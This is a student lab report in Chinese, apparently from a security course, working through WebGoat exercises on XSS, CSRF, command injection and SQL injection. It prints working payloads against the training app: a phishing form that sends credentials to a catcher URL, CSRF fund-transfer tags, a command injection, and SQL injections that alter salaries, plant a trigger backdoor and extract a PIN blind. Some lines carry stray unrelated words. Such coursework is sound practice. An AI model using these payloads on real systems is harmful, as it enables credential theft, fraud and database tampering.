本实践的目标理解经常使用网络攻击技术的基本原理。Webgoat实践下相关实验。javascript
2.XSS攻击的原理,如何防护?html
3.CSRF攻击原理,如何防护?前端
1.WebGoat分为简单版和开发板,简单版是个Java的Jar包,只须要有Java环境便可,咱们在命令行里执行java -jar webgoat-container-7.0.1-war-exec.jar
运行WebGoat:java
2.当页面成功停在下图位置时,最小化终端窗口:程序员
3.打开浏览器,在地址栏输入localhost:8080/WebGoat打开WebGoat,选择默认帐号、密码便可登录成功。web
4.进入WebGoat以后,能够看到有不少题目来让咱们进行练习。sql
先编写一个包含用户名、密码的前端代码:数据库
<head> <body> <div> <div style="float:left;height:100px;width:50%;background-color:green;"></div> <div style="float:left;height:100px;width:50%;background-color:red;"></div> </div> <div style="background-color:blue;height:200px;clear:both;"></div> </div></div> </form> <script> function hack(){ XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("attack.!!!!!! Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value); } </script> <form name="phish"> <br> <br> <HR> <H2>This feature requires account login:</H2> <br> <br>Enter Username:<br> <input type="text" name="user"> <br>Enter Password:<br> <input type="password" name = "pass"> <br> <input type="submit" name="login" value="login" onclick="hack()"> </form> <br> <br> <HR> </body> </head>
而后在webgoat找到xss攻击打开Phishing with XSS(第一个选项),将这段代码输入到输入框中,点击search出现以下登陆框:浏览器
1.在登陆框中输入用户名、密码:安全
2.点击登陆后跳出弹框,其中包含用户输入的用户名、密码。
3.攻击成功!
存储型XSS的攻击基本流程:
a. 好比在某个论坛提供留言板功能,黑客在留言板内插入恶意的html或者Javascript代码,而且提交。
b. 网站后台程序将留言内容存储在数据中
c. 而后一个用户也访问这个论坛,并刷新了留言板,这时网站后台从数据库中读取了以前黑客的留言内容,而且直接插入在html页面中,这就可能致使了:黑客留言的脚本自己应该做为内容显示在留言板的,而后此时可能黑客的留言脚本被浏览器解释执行了。
那么黑客的脚本能够用来作哪些事儿:
经过javascript获取用户的cookie,根据这个cookie窃取用户信息
重定向网站到一个钓鱼网站
从新更改页面内容,伪装让客户输入用户名,密码,而后提交到黑客的服务器
1.打开Stored XSS Attacks(XSS第二个选项),在Message框中输入<script>alert("I am 20155308 haowenfei");</script>
2.提交后,再次点击刚刚建立的帖子,成功弹出窗口,说明攻击成功:
1.当咱们输入错误用户信息后,服务器校验输入有误,返回错误页面并将错误内容展现给咱们看:
2.打开Reflected XSS Attacks(XSS的第三个选项),在code框中输入<script>alert("I am 20155308 haowenfei");</script>
3.点击Purchase出现对话框,显示I am 20155308 haowenfei。攻击成功!
1.咱们的目的是要写一个URL诱使其余用户点击,从而触发CSRF攻击,咱们能够以图片的的形式将URL放进Message框,这时的URL对其余用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件。
2.打开CSRF
2.咱们在message框中输入这样一串代码:
<img src='attack?Screen=src值&menu=menu值&transferFunds=转帐数额' width='1' height='1'>
,注意这里面的Screen和menu的值每一个人的电脑可能不同,能够在当前页面的下面有个Parameters进行查看:
3.提交后生成一个连接20155308:
4.点击学号名便可查看用户操做的信息,攻击成功,转账了20155308元。
1.咱们依旧和上一个同样要构造CSRF攻击,不过此次其包括了两个请求,一是转帐请求,二是确认转帐成功请求,即须要额外传递两个参数给服务器(transferFunds=........,transferFunds=CONFIRM)
2.查看页面右边Parameters中的src和menu值,并在title框中输入学号,message框中输入代码:
<iframe src="attack?Screen=src值&menu=menu值&transferFunds=转帐数额"> </iframe> <iframe src="attack?Screen=src值&menu=menu值&transferFunds=CONFIRM"> </iframe>
提交后生成一个连接20155308:
3.点击学号名便可查看用户操做的信息,攻击成功
1.这个题是要求可以在目标主机上执行系统命令,咱们能够经过火狐浏览器下的一个扩展Firebug(就是右上角的小虫的标志)对源代码进行修改,例如在BackDoors.help旁边加上"& netstat -an & ipconfig"
:
2.以后在下拉菜单中能看到咱们修改后的值:
3.选中修改后的值再点view,能够看到命令被执行,出现系统网络链接状况:
1.咱们要经过注入SQL字符串的方式查看全部的天气数据,咱们上次实验作过相似的,只要加上一个1=1这种永真式便可达到咱们的目的,依旧利用firebug,在任意一个值好比101旁边加上or 1=1
:
2.选中Columbia,点Go,能够看到全部天气数据:
%0d%0aLogin succeeded !admin
达到欺骗登陆效果,破解成功:
1.使用一个新的工具firebug(浏览器右上方有一个小昆虫同样的标志),能够显示当前网页的源码并直接在其中修改。
2.使用用户Neville进行登陆,在密码栏中输入' or 1=1 --
进行SQL注入,本觉得会成功,可是登陆失败,查看源码发现输入框对输入的字符长度进行了限制,最多容许输入8个字符。
3.在查看源码的时候怎么找到限制字符长度的语句在哪里呢?在查看源码的窗口的顶部左边有一个鼠标同样的标志,点击它,再点击题目页面的password
输入框的位置,源码部分就会自动跳转到关于密码的部分,缩小范围后就好找多了。
4.对长度maxlength
值改为了100
(点击Edit,进行编辑),而后在密码栏中再次输入' or 1=1 --
,点击登陆就成功了(记得在登录的时候不要关闭源代码程序,由于源代码程序不能保存,一关掉,至关于回到以前的代码了)
1.用上一题的方法成功登陆成功以后,点击ViewProfile能够看到Larry的信息
2.查看网页源码,选择查看viewprofile部分的代码,这时候能够看到一行用员工id做为索引来传送数据的代码,双击这行代码就能够出现value的值,由于咱们想要用Larry的帐户浏览老板信息,而大多数企业公司里老板的工资应该是最高的,因此咱们就把其中的value值由101
改成101 or 1=1 order by salary desc --
,
3.再去查询Larry信息,发现咱们看到的是老板的信息
能够看到老板应该就是Neville了,电话地址电邮工资卡等等信息尽收眼底。
1.先输入示例101
进行尝试,获得了该用户的信息。
2.观察发现输入的语句不进行验证,因而咱们输入语句:101; update employee set salary=5308
成功将该用户的工资变成5308,攻击成功:
3.若是输入语句101 or 1=1;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='20155308@hackme.com' WHERE userid = NEW.userid
就能够了,表中一旦添加新用户那么就在用户表里将新用户的邮箱改成我设置的邮箱。
1.尝试题目中给出的例子,在输入框输入101
,运行后发现返回Account number is valid
,说明这个数是合法的!
2.构造输入语句101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 数值 );
,根据返回的语句是否合法判断pin值的范围。这里使用二分法,测试值是多少
3.最后肯定值是2364,输入2364
后破解成功:
本次实验我是在老师kali机的环境下进行的,没有过多关注环境的搭建,由于之前都进行过,因此更多的关注点都在Webgoat上的实践。经过对Webgoat的使用,主要学习了SQL注入攻击、XSS攻击和CSRF攻击。对于这三个方面的攻击,分为不少小模块的学习。在整个学习过程当中,发现咱们此次的实验攻击不少部分都是关于构造语句、更改语句进行的攻击,我以为这个部分虽然如今实现很简单,可是经过学习的不断深刻,如何可以将攻击高层次化,更加完整,是咱们学习的目标。